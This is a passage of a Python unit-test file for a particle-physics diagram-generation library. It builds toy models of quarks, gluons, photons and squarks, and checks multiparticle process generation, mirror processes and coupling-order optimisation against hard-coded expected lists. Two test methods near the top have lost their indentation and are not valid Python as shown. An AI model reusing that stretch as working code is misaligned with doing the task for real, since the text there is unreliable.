        antiu.set('is_part', False)

        # A quark D and its antiparticle
        mypartlist.append(base_objects.Particle({'name':'d',
                      'antiname':'d~',
                      'spin':2,
                      'color':3,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'d',
                      'antitexname':'\bar d',
                      'line':'straight',
                      'charge':-1. / 3.,
                      'pdg_code':1,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':False}))
        antid = copy.copy(mypartlist[2])
        antid.set('is_part', False)

        # A photon
        mypartlist.append(base_objects.Particle({'name':'a',
                      'antiname':'a',
                      'spin':3,
                      'color':1,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'\gamma',
                      'antitexname':'\gamma',
                      'line':'wavy',
                      'charge':0.,
                      'pdg_code':22,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':True}))

        # A electron and positron
        mypartlist.append(base_objects.Particle({'name':'e-',
                      'antiname':'e+',
                      'spin':2,
                      'color':1,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'e^-',
                      'antitexname':'e^+',
                      'line':'straight',
                      'charge':-1.,
                      'pdg_code':11,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':False}))
        antie = copy.copy(mypartlist[4])
        antie.set('is_part', False)

        # 3 gluon vertiex
        myinterlist.append(base_objects.Interaction({
                      'id': 1,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[0]] * 3),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'G'},
                      'orders':{'QCD':1}}))

        # 4 gluon vertex
        myinterlist.append(base_objects.Interaction({
                      'id': 2,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[0]] * 4),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'G^2'},
                      'orders':{'QCD':2}}))

        # Gluon and photon couplings to quarks
        myinterlist.append(base_objects.Interaction({
                      'id': 3,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[1], \
                                             antiu, \
                                             mypartlist[0]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQQ'},
                      'orders':{'QCD':1}}))

        myinterlist.append(base_objects.Interaction({
                      'id': 4,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[1], \
                                             antiu, \
                                             mypartlist[3]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQED'},
                      'orders':{'QED':1}}))

        myinterlist.append(base_objects.Interaction({
                      'id': 5,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[2], \
                                             antid, \
                                             mypartlist[0]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQQ'},
                      'orders':{'QCD':1}}))

        myinterlist.append(base_objects.Interaction({
                      'id': 6,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[2], \
                                             antid, \
                                             mypartlist[3]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQED'},
                      'orders':{'QED':1}}))

        # Coupling of e to gamma
        myinterlist.append(base_objects.Interaction({
                      'id': 7,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[4], \
                                             antie, \
                                             mypartlist[3]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQED'},
                      'orders':{'QED':1}}))

        self.mymodel.set('particles', mypartlist)
        self.mymodel.set('interactions', myinterlist)
        # QED is twice as "expensive" as QCD in the order hierarchy.
        self.mymodel.set('order_hierarchy', {'QCD':1, 'QED':2})

        # Default 2 -> 3 multiprocess fixture (ids 3, 4, 5 are list indices
        # into particle names here, used only for set/get tests).
        self.my_multi_leglist = base_objects.MultiLegList(\
            [copy.copy(base_objects.MultiLeg({'ids':[3, 4, 5],
                                              'state':True})) for \
             dummy in range(5)])

        self.my_multi_leglist[0].set('state', False)
        self.my_multi_leglist[1].set('state', False)

        mydict = {'legs':self.my_multi_leglist,
                  'orders':{'QCD':5, 'QED':1},
                  'model':self.mymodel,
                  'id':3}

        self.my_process_definition = base_objects.ProcessDefinition(mydict)
        self.my_process_definitions = base_objects.ProcessDefinitionList(\
            [self.my_process_definition])

        self.mydict = {'process_definitions':self.my_process_definitions}

        self.my_multi_process = diagram_generation.MultiProcess(\
            self.mydict)
def test_setget_process_correct(self):
"Test correct MultiProcess object __init__, get and set"
myprocess2 = diagram_generation.MultiProcess()
for prop in self.mydict.keys():
myprocess2.set(prop, self.mydict[prop])
self.assertEqual(self.my_multi_process, myprocess2)
def test_setget_process_exceptions(self):
"Test error raising in MultiProcess __init__, get and set"
wrong_dict = self.mydict
wrong_dict['wrongparam'] = 'wrongvalue'
a_number = 0
# Test init
self.assertRaises(diagram_generation.MultiProcess.PhysicsObjectError,
diagram_generation.MultiProcess,
wrong_dict)
self.assertRaises(AssertionError,
diagram_generation.MultiProcess,
a_number)
# Test get
self.assertRaises(AssertionError,
self.my_multi_process.get,
a_number)
self.assertRaises(diagram_generation.MultiProcess.PhysicsObjectError,
self.my_multi_process.get,
'wrongparam')
# Test set
self.assertRaises(AssertionError,
self.my_multi_process.set,
a_number, 0)
self.assertRaises(diagram_generation.MultiProcess.PhysicsObjectError,
self.my_multi_process.set,
'wrongparam', 0)
    def test_representation(self):
        """Test process object string representation."""
        # Expected PhysicsObject.__str__ output: the process definitions
        # from the fixture plus an (empty, lazily-filled) amplitude list.
        goal = "{\n"
        goal = goal + " \'process_definitions\': %s,\n" % repr(self.my_process_definitions)
        goal = goal + " \'amplitudes\': %s\n}" % repr(diagram_generation.AmplitudeList())

        self.assertEqual(goal, str(self.my_multi_process))
    def test_multiparticle_pp_nj(self):
        """Setting up and testing pp > nj based on multiparticle lists,
        using the amplitude functionality of MultiProcess
        (which makes partial use of crossing symmetries)
        """

        max_fs = 2 # 3

        p = [1, -1, 2, -2, 21]

        my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});

        # Expected totals of attempted processes per final-state multiplicity
        # (kept for reference; only the valid-process lists are asserted).
        goal_number_processes = [219, 379]

        # goal_valid_procs[nfs-2] = [(leg ids, number of diagrams), ...]
        goal_valid_procs = []
        goal_valid_procs.append([([1, 1, 1, 1], 4),
                                 ([1, -1, 1, -1], 4),
                                 ([1, -1, 2, -2], 2),
                                 ([1, -1, 21, 21], 3),
                                 ([1, 2, 1, 2], 2),
                                 ([1, -2, 1, -2], 2),
                                 ([1, 21, 1, 21], 3),
                                 ([-1, 1, 1, -1], 4),
                                 ([-1, 1, 2, -2], 2),
                                 ([-1, 1, 21, 21], 3),
                                 ([-1, -1, -1, -1], 4),
                                 ([-1, 2, -1, 2], 2),
                                 ([-1, -2, -1, -2], 2),
                                 ([-1, 21, -1, 21], 3),
                                 ([2, 1, 1, 2], 2),
                                 ([2, -1, -1, 2], 2),
                                 ([2, 2, 2, 2], 4),
                                 ([2, -2, 1, -1], 2),
                                 ([2, -2, 2, -2], 4),
                                 ([2, -2, 21, 21], 3),
                                 ([2, 21, 2, 21], 3),
                                 ([-2, 1, 1, -2], 2),
                                 ([-2, -1, -1, -2], 2),
                                 ([-2, 2, 1, -1], 2),
                                 ([-2, 2, 2, -2], 4),
                                 ([-2, 2, 21, 21], 3),
                                 ([-2, -2, -2, -2], 4),
                                 ([-2, 21, -2, 21], 3),
                                 ([21, 1, 1, 21], 3),
                                 ([21, -1, -1, 21], 3),
                                 ([21, 2, 2, 21], 3),
                                 ([21, -2, -2, 21], 3),
                                 ([21, 21, 1, -1], 3),
                                 ([21, 21, 2, -2], 3),
                                 ([21, 21, 21, 21], 4)])
        goal_valid_procs.append([([1, 1, 1, 1, 21], 18),
                                 ([1, -1, 1, -1, 21], 18),
                                 ([1, -1, 2, -2, 21], 9),
                                 ([1, -1, 21, 21, 21], 16),
                                 ([1, 2, 1, 2, 21], 9),
                                 ([1, -2, 1, -2, 21], 9),
                                 ([1, 21, 1, 1, -1], 18),
                                 ([1, 21, 1, 2, -2], 9),
                                 ([1, 21, 1, 21, 21], 16),
                                 ([-1, 1, 1, -1, 21], 18),
                                 ([-1, 1, 2, -2, 21], 9),
                                 ([-1, 1, 21, 21, 21], 16),
                                 ([-1, -1, -1, -1, 21], 18),
                                 ([-1, 2, -1, 2, 21], 9),
                                 ([-1, -2, -1, -2, 21], 9),
                                 ([-1, 21, 1, -1, -1], 18),
                                 ([-1, 21, -1, 2, -2], 9),
                                 ([-1, 21, -1, 21, 21], 16),
                                 ([2, 1, 1, 2, 21], 9),
                                 ([2, -1, -1, 2, 21], 9),
                                 ([2, 2, 2, 2, 21], 18),
                                 ([2, -2, 1, -1, 21], 9),
                                 ([2, -2, 2, -2, 21], 18),
                                 ([2, -2, 21, 21, 21], 16),
                                 ([2, 21, 1, -1, 2], 9),
                                 ([2, 21, 2, 2, -2], 18),
                                 ([2, 21, 2, 21, 21], 16),
                                 ([-2, 1, 1, -2, 21], 9),
                                 ([-2, -1, -1, -2, 21], 9),
                                 ([-2, 2, 1, -1, 21], 9),
                                 ([-2, 2, 2, -2, 21], 18),
                                 ([-2, 2, 21, 21, 21], 16),
                                 ([-2, -2, -2, -2, 21], 18),
                                 ([-2, 21, 1, -1, -2], 9),
                                 ([-2, 21, 2, -2, -2], 18),
                                 ([-2, 21, -2, 21, 21], 16),
                                 ([21, 1, 1, 1, -1], 18),
                                 ([21, 1, 1, 2, -2], 9),
                                 ([21, 1, 1, 21, 21], 16),
                                 ([21, -1, 1, -1, -1], 18),
                                 ([21, -1, -1, 2, -2], 9),
                                 ([21, -1, -1, 21, 21], 16),
                                 ([21, 2, 1, -1, 2], 9),
                                 ([21, 2, 2, 2, -2], 18),
                                 ([21, 2, 2, 21, 21], 16),
                                 ([21, -2, 1, -1, -2], 9),
                                 ([21, -2, 2, -2, -2], 18),
                                 ([21, -2, -2, 21, 21], 16),
                                 ([21, 21, 1, -1, 21], 16),
                                 ([21, 21, 2, -2, 21], 16),
                                 ([21, 21, 21, 21, 21], 25)])

        for nfs in range(2, max_fs + 1):

            # Define the multiprocess: p p > nfs final-state p's
            my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * (2 + nfs)])

            my_multi_leglist[0].set('state', False)
            my_multi_leglist[1].set('state', False)

            # The QED order cap removes photon-exchange diagrams beyond nfs.
            my_process_definition = base_objects.ProcessDefinition({\
                                                     'legs':my_multi_leglist,
                                                     'model':self.mymodel,
                                                     'orders': {'QED': nfs}})
            my_multiprocess = diagram_generation.MultiProcess(\
                {'process_definitions':\
                 base_objects.ProcessDefinitionList([my_process_definition])})

            nproc = 0

            # Calculate diagrams for all processes
            amplitudes = my_multiprocess.get('amplitudes')

            valid_procs = [([leg.get('id') for leg in \
                             amplitude.get('process').get('legs')],
                            len(amplitude.get('diagrams'))) \
                           for amplitude in amplitudes]

            if nfs <= 3:
                self.assertEqual(valid_procs, goal_valid_procs[nfs-2])

            #print 'pp > ',nfs,'j (p,j = ', p, '):'
            #print 'Valid processes: ',len(filter(lambda item: item[1] > 0, valid_procs))
            #print 'Attempted processes: ',len(amplitudes)
    def test_multiparticle_stop_decay(self):
        """Test that process mirroring is not used in the process st > st g
        """

        # Local model with a gluon and two stop squarks (t1, t2) that mix
        # via the gluon; built here rather than in setUp since only this
        # test needs it.
        mypartlist = base_objects.ParticleList()
        myinterlist = base_objects.InteractionList()
        mymodel = base_objects.Model()

        # A gluon
        mypartlist.append(base_objects.Particle({'name':'g',
                      'antiname':'g',
                      'spin':3,
                      'color':8,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'g',
                      'antitexname':'g',
                      'line':'curly',
                      'charge':0.,
                      'pdg_code':21,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':True}))

        g = mypartlist[-1]

        # Two stop squarks
        mypartlist.append(base_objects.Particle({'name':'t1',
                      'antiname':'t1~',
                      'spin':1,
                      'color':3,
                      'mass':'Mt1',
                      'width':'Wt1',
                      'texname':'t1',
                      'antitexname':'\bar t1',
                      'line':'straight',
                      'charge':2. / 3.,
                      'pdg_code':1000006,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':False}))
        t1 = mypartlist[-1]
        t1bar = copy.copy(t1)
        t1bar.set('is_part', False)

        mypartlist.append(base_objects.Particle({'name':'t2',
                      'antiname':'t2~',
                      'spin':1,
                      'color':3,
                      'mass':'Mt2',
                      'width':'Wt2',
                      'texname':'t2',
                      'antitexname':'\bar t2',
                      'line':'straight',
                      'charge':2. / 3.,
                      'pdg_code':2000006,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':False}))
        t2 = mypartlist[-1]
        t2bar = copy.copy(t2)
        t2bar.set('is_part', False)

        # Gluon couplings to squarks (including t1-t2 mixing vertices)
        myinterlist.append(base_objects.Interaction({
                      'id': 1,
                      'particles': base_objects.ParticleList(\
                                            [t1bar, \
                                             t1, \
                                             g]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQQ'},
                      'orders':{'QCD':1}}))

        myinterlist.append(base_objects.Interaction({
                      'id': 2,
                      'particles': base_objects.ParticleList(\
                                            [t2bar, \
                                             t2, \
                                             g]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQQ'},
                      'orders':{'QCD':1}}))

        myinterlist.append(base_objects.Interaction({
                      'id': 3,
                      'particles': base_objects.ParticleList(\
                                            [t1bar, \
                                             t2, \
                                             g]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'G12G'},
                      'orders':{'QCD':1}}))

        myinterlist.append(base_objects.Interaction({
                      'id': 4,
                      'particles': base_objects.ParticleList(\
                                            [t2bar, \
                                             t1, \
                                             g]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'G12G'},
                      'orders':{'QCD':1}}))

        mymodel.set('particles', mypartlist)
        mymodel.set('interactions',myinterlist)

        max_fs = 2

        p = [1000006, 2000006, -1000006, -2000006]

        my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});

        goal_number_processes = [8]

        # All 8 squark-decay combinations must appear individually, i.e.
        # mirroring must NOT collapse e.g. (t1, t2) with (t2, t1).
        goal_valid_procs = []
        goal_valid_procs.append([([1000006, 1000006, 21], 1),
                                 ([1000006, 2000006, 21], 1),
                                 ([2000006, 1000006, 21], 1),
                                 ([2000006, 2000006, 21], 1),
                                 ([-1000006, -1000006, 21], 1),
                                 ([-1000006, -2000006, 21], 1),
                                 ([-2000006, -1000006, 21], 1),
                                 ([-2000006, -2000006, 21], 1)])

        for nfs in range(2, max_fs + 1):

            # Define the multiprocess: squark > squark + (nfs-1) gluons,
            # with only leg 0 initial-state (a decay process).
            my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * 2])
            my_multi_leglist += [copy.copy(base_objects.MultiLeg({'ids':[21]}))\
                                 for n in range(2, nfs + 1)]

            my_multi_leglist[0].set('state', False)

            my_process_definition = base_objects.ProcessDefinition({\
                                                     'legs':my_multi_leglist,
                                                     'model':mymodel,
                                                     'orders': {'QED': nfs}})
            # collect_mirror_procs is on, but must have no effect for a
            # 1 -> n decay process.
            my_multiprocess = diagram_generation.MultiProcess(\
                {'process_definitions':\
                 base_objects.ProcessDefinitionList([my_process_definition])},
                collect_mirror_procs = True)

            nproc = 0

            # Calculate diagrams for all processes
            amplitudes = my_multiprocess.get('amplitudes')

            valid_procs = [([leg.get('id') for leg in \
                             amplitude.get('process').get('legs')],
                            len(amplitude.get('diagrams'))) \
                           for amplitude in amplitudes]

            # print 'pp > ',nfs,'j (p,j = ', p, '):'
            # print 'Valid processes: ',valid_procs

            if nfs <= 3:
                self.assertEqual(valid_procs, goal_valid_procs[nfs-2])
    def test_heft_multiparticle_pp_hnj(self):
        """Test pp > h+nj in HEFT, which tests new optimize_orders
        """

        # Local HEFT-like model: SM light particles plus a Higgs with
        # effective ggh / gggh / ggggh vertices (order HIG).
        mypartlist = base_objects.ParticleList()
        myinterlist = base_objects.InteractionList()

        # A gluon
        mypartlist.append(base_objects.Particle({'name':'g',
                      'antiname':'g',
                      'spin':3,
                      'color':8,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'g',
                      'antitexname':'g',
                      'line':'curly',
                      'charge':0.,
                      'pdg_code':21,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':True}))

        g = mypartlist[-1]

        # A quark U and its antiparticle
        mypartlist.append(base_objects.Particle({'name':'u',
                      'antiname':'u~',
                      'spin':2,
                      'color':3,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'u',
                      'antitexname':'\bar u',
                      'line':'straight',
                      'charge':2. / 3.,
                      'pdg_code':2,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':False}))
        antiu = copy.copy(mypartlist[1])
        antiu.set('is_part', False)

        # A quark D and its antiparticle
        mypartlist.append(base_objects.Particle({'name':'d',
                      'antiname':'d~',
                      'spin':2,
                      'color':3,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'d',
                      'antitexname':'\bar d',
                      'line':'straight',
                      'charge':-1. / 3.,
                      'pdg_code':1,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':False}))
        antid = copy.copy(mypartlist[2])
        antid.set('is_part', False)

        # A photon
        mypartlist.append(base_objects.Particle({'name':'a',
                      'antiname':'a',
                      'spin':3,
                      'color':1,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'\gamma',
                      'antitexname':'\gamma',
                      'line':'wavy',
                      'charge':0.,
                      'pdg_code':22,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':True}))

        # A higgs
        mypartlist.append(base_objects.Particle({'name':'h',
                      'antiname':'h',
                      'spin':1,
                      'color':1,
                      'mass':'MH',
                      'width':'WH',
                      'texname':'h',
                      'antitexname':'h',
                      'line':'dashed',
                      'charge':0.,
                      'pdg_code':25,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':True}))
        h = mypartlist[-1]

        # 3 gluon vertiex
        myinterlist.append(base_objects.Interaction({
                      'id': 1,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[0]] * 3),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'G'},
                      'orders':{'QCD':1}}))

        # 4 gluon vertex
        myinterlist.append(base_objects.Interaction({
                      'id': 2,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[0]] * 4),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'G^2'},
                      'orders':{'QCD':2}}))

        # Gluon and photon couplings to quarks
        myinterlist.append(base_objects.Interaction({
                      'id': 3,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[1], \
                                             antiu, \
                                             mypartlist[0]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQQ'},
                      'orders':{'QCD':1}}))

        myinterlist.append(base_objects.Interaction({
                      'id': 4,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[1], \
                                             antiu, \
                                             mypartlist[3]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQED'},
                      'orders':{'QED':1}}))

        myinterlist.append(base_objects.Interaction({
                      'id': 5,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[2], \
                                             antid, \
                                             mypartlist[0]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQQ'},
                      'orders':{'QCD':1}}))

        myinterlist.append(base_objects.Interaction({
                      'id': 6,
                      'particles': base_objects.ParticleList(\
                                            [mypartlist[2], \
                                             antid, \
                                             mypartlist[3]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQED'},
                      'orders':{'QED':1}}))

        # Couplings of h to g (effective HEFT vertices)
        myinterlist.append(base_objects.Interaction({
                      'id': 7,
                      'particles': base_objects.ParticleList(\
                                            [g,
                                             g, \
                                             h]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GGH'},
                      'orders':{'HIG':1}}))

        myinterlist.append(base_objects.Interaction({
                      'id': 8,
                      'particles': base_objects.ParticleList(\
                                            [g,
                                             g,
                                             g,
                                             h]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GGGH'},
                      'orders':{'HIG':1, 'QCD':1}}))

        myinterlist.append(base_objects.Interaction({
                      'id': 9,
                      'particles': base_objects.ParticleList(\
                                            [g,
                                             g,
                                             g,
                                             g,
                                             h]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GGGGH'},
                      'orders':{'HIG':1, 'QCD':2}}))

        mymodel = base_objects.Model()
        mymodel.set('particles', mypartlist)
        mymodel.set('interactions', myinterlist)
        mymodel.set('order_hierarchy', {'QCD':1, 'HIG':1, 'QED':2})
        # expansion_order HIG:1 limits diagrams to a single effective vertex.
        mymodel.set('expansion_order', {'QCD':-1, 'HIG':1, 'QED':-1})

        max_fs = 2

        p = [21, 1, 2, -1, -2]

        my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});

        goal_number_processes = [7, 21]

        # goal_valid_procs[nfs-1] = [(leg ids, number of diagrams), ...]
        goal_valid_procs = [[([21, 21, 21, 25], 4),
                             ([21, 1, 1, 25], 1),
                             ([21, 2, 2, 25], 1),
                             ([21, -1, -1, 25], 1),
                             ([21, -2, -2, 25], 1),
                             ([1, -1, 21, 25], 1),
                             ([2, -2, 21, 25], 1)],
                            [([21, 21, 21, 21, 25], 26),
                             ([21, 21, 1, -1, 25], 8),
                             ([21, 21, 2, -2, 25], 8),
                             ([21, 1, 21, 1, 25], 8),
                             ([21, 2, 21, 2, 25], 8),
                             ([21, -1, 21, -1, 25], 8),
                             ([21, -2, 21, -2, 25], 8),
                             ([1, 1, 1, 1, 25], 2),
                             ([1, 2, 1, 2, 25], 1),
                             ([1, -1, 21, 21, 25], 8),
                             ([1, -1, 1, -1, 25], 2),
                             ([1, -1, 2, -2, 25], 1),
                             ([1, -2, 1, -2, 25], 1),
                             ([2, 2, 2, 2, 25], 2),
                             ([2, -1, 2, -1, 25], 1),
                             ([2, -2, 21, 21, 25], 8),
                             ([2, -2, 1, -1, 25], 1),
                             ([2, -2, 2, -2, 25], 2),
                             ([-1, -1, -1, -1, 25], 2),
                             ([-1, -2, -1, -2, 25], 1),
                             ([-2, -2, -2, -2, 25], 2)]]

        for nfs in range(1, max_fs + 1):

            # Define the multiprocess: p p > nfs p's + h
            my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * (2 + nfs)])
            my_multi_leglist.append(base_objects.MultiLeg({'ids': [25]}))

            my_multi_leglist[0].set('state', False)
            my_multi_leglist[1].set('state', False)

            my_process_definition = base_objects.ProcessDefinition({\
                                                     'legs':my_multi_leglist,
                                                     'model':mymodel})
            my_multiprocess = diagram_generation.MultiProcess(\
                my_process_definition, collect_mirror_procs = True)

            nproc = 0

            # Calculate diagrams for all processes
            amplitudes = my_multiprocess.get('amplitudes')

            valid_procs = [([leg.get('id') for leg in \
                             amplitude.get('process').get('legs')],
                            len(amplitude.get('diagrams'))) \
                           for amplitude in amplitudes]

            if nfs <= 3:
                self.assertEqual(valid_procs, goal_valid_procs[nfs-1])

            #print 'pp > h + ',nfs,'j (p,j = ', p, '):'
            #print 'Processes: ',len(amplitudes), \
            #      ' with ', sum([v[1] for v in valid_procs]),
            #for amplitude in amplitudes:
            #    print amplitude.get('process').nice_string()
            #print 'valid_procs = ',valid_procs
    def test_multiparticle_mirror_pp_3j(self):
        """Setting up and testing pp > 3j mirror process functionality
        """

        max_fs = 3

        p = [21, 1, 2, -1, -2]

        my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});

        goal_number_processes = 29

        # (leg ids, has_mirror_process): mirror is True only when the two
        # initial-state particles differ, so the swapped process can be
        # obtained from this one by mirroring.
        goal_legs_mirror = [\
            ([21, 21, 21, 21, 21], False),
            ([21, 21, 21, 1, -1], False),
            ([21, 21, 21, 2, -2], False),
            ([21, 1, 21, 21, 1], True),
            ([21, 1, 1, 1, -1], True),
            ([21, 1, 1, 2, -2], True),
            ([21, 2, 21, 21, 2], True),
            ([21, 2, 1, 2, -1], True),
            ([21, 2, 2, 2, -2], True),
            ([21, -1, 21, 21, -1], True),
            ([21, -1, 1, -1, -1], True),
            ([21, -1, 2, -1, -2], True),
            ([21, -2, 21, 21, -2], True),
            ([21, -2, 1, -1, -2], True),
            ([21, -2, 2, -2, -2], True),
            ([1, 1, 21, 1, 1], False),
            ([1, 2, 21, 1, 2], True),
            ([1, -1, 21, 21, 21], True),
            ([1, -1, 21, 1, -1], True),
            ([1, -1, 21, 2, -2], True),
            ([1, -2, 21, 1, -2], True),
            ([2, 2, 21, 2, 2], False),
            ([2, -1, 21, 2, -1], True),
            ([2, -2, 21, 21, 21], True),
            ([2, -2, 21, 1, -1], True),
            ([2, -2, 21, 2, -2], True),
            ([-1, -1, 21, -1, -1], False),
            ([-1, -2, 21, -1, -2], True),
            ([-2, -2, 21, -2, -2], False)]

        # Define the multiprocess: p p > p p p at pure QCD (QED order 0)
        my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * 5])

        my_multi_leglist[0].set('state', False)
        my_multi_leglist[1].set('state', False)

        my_process_definition = base_objects.ProcessDefinition({\
                                                 'legs':my_multi_leglist,
                                                 'model':self.mymodel,
                                                 'orders': {'QED': 0}})

        # Calculate diagrams for all processes
        myproc = diagram_generation.MultiProcess(my_process_definition,
                                                 collect_mirror_procs = True)

        amplitudes = myproc.get('amplitudes')

        legs_mirror = [([l.get('id') for l in a.get('process').get('legs')],
                        a.get('has_mirror_process')) for a in amplitudes]

        self.assertEqual(legs_mirror, goal_legs_mirror)
    def test_find_optimal_order(self):
        """Test find_optimal_process_orders for different configurations
        """

        # First try p p > e+ e- + nj: the optimal WEIGHTED order grows by
        # one unit per extra jet (QED:2 for the lepton pair + QCD:1 each).
        max_fs = 5

        p = [21, 1, -1, 2, -2]

        my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});

        orders = [4, 5, 6, 7, 8]

        for nfs in range(2, max_fs + 1):

            # Define the multiprocess
            my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * (nfs)])

            my_multi_leglist[0].set('state', False)
            my_multi_leglist[1].set('state', False)
            my_multi_leglist.append(base_objects.MultiLeg({'ids': [11],
                                                           'state': True}))
            my_multi_leglist.append(base_objects.MultiLeg({'ids': [-11],
                                                           'state': True}))

            my_process_definition = base_objects.ProcessDefinition({'legs':my_multi_leglist,
                                                                    'model':self.mymodel})

            # Check coupling orders for process
            self.assertEqual(diagram_generation.MultiProcess.\
                             find_optimal_process_orders(my_process_definition),
                             {'WEIGHTED': orders[nfs-2]})

        # Now check p p > a > p p: a required photon s-channel forces at
        # least two QED vertices (weight 4).
        max_fs = 3
        orders = [4, 5]

        for nfs in range(2, max_fs + 1):

            # Define the multiprocess
            my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for \
                                          leg in [my_multi_leg] * (2+nfs)])

            my_multi_leglist[0].set('state', False)
            my_multi_leglist[1].set('state', False)

            my_process_definition = base_objects.ProcessDefinition({\
                                                'legs':my_multi_leglist,
                                                'model':self.mymodel,
                                                'required_s_channels':[22]})

            self.assertEqual(diagram_generation.MultiProcess.\
                             find_optimal_process_orders(my_process_definition),
                             {'WEIGHTED': orders[nfs-2]})

        # Now check p p > a|g > p p: the gluon alternative allows the
        # cheaper pure-QCD weight.
        max_fs = 3
        orders = [2, 3]

        for nfs in range(2, max_fs + 1):

            # Define the multiprocess
            my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for \
                                          leg in [my_multi_leg] * (2+nfs)])

            my_multi_leglist[0].set('state', False)
            my_multi_leglist[1].set('state', False)

            my_process_definition = base_objects.ProcessDefinition({\
                                                'legs':my_multi_leglist,
                                                'model':self.mymodel,
                                                'required_s_channels':[[22],[21]]})

            self.assertEqual(diagram_generation.MultiProcess.\
                             find_optimal_process_orders(my_process_definition),
                             {'WEIGHTED': orders[nfs-2]})

        # Check that it works with multiple non-QCD orders.
        # NOTE: deliberately reuses the last loop's nfs and the last
        # my_process_definition; the model is restored afterwards.
        myoldinterlist = self.mymodel.get('interactions')
        myinterlist = copy.copy(myoldinterlist)
        myinterlist.append(base_objects.Interaction({
                      'id': 8,
                      'particles': base_objects.ParticleList(\
                                            []),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQED'},
                      'orders':{'SQED':1}}))

        self.mymodel.set('interactions', myinterlist)
        self.mymodel.set('order_hierarchy', {'QCD':1, 'QED':2, 'SQED':2})

        self.assertEqual(diagram_generation.MultiProcess.\
                         find_optimal_process_orders(my_process_definition),
                         {'WEIGHTED': orders[nfs-2]})

        self.mymodel.set('interactions', myoldinterlist)

        # Now check decay process p > p (a|g): no order optimization for a
        # generic definition, but WEIGHTED appears once flagged as a decay
        # chain.
        max_fs = 3
        orders = [1, 2]
        ag = [21, 22]
        my_ag_leg = base_objects.MultiLeg({'ids': ag, 'state': True});

        for nfs in range(2, max_fs + 1):

            # Define the multiprocess
            my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for \
                                          leg in [my_multi_leg] * 2])
            my_multi_leglist.extend([copy.copy(leg) for \
                                          leg in [my_ag_leg] * (nfs-1)])

            my_multi_leglist[0].set('state', False)

            my_process_definition = base_objects.ProcessDefinition({\
                                                'legs':my_multi_leglist,
                                                'model':self.mymodel})

            self.assertEqual(diagram_generation.MultiProcess.\
                             find_optimal_process_orders(my_process_definition),
                             {})

            my_process_definition.set('is_decay_chain', True)

            self.assertEqual(diagram_generation.MultiProcess.\
                             find_optimal_process_orders(my_process_definition),
                             {'WEIGHTED': orders[nfs-2]})
    def test_multiparticle_pp_nj_with_required_s_channel(self):
        """Setting up and testing pp > nj with required photon s-channel
        """

        max_fs = 2 # 3

        p = [1, -1, 2, -2, 21]

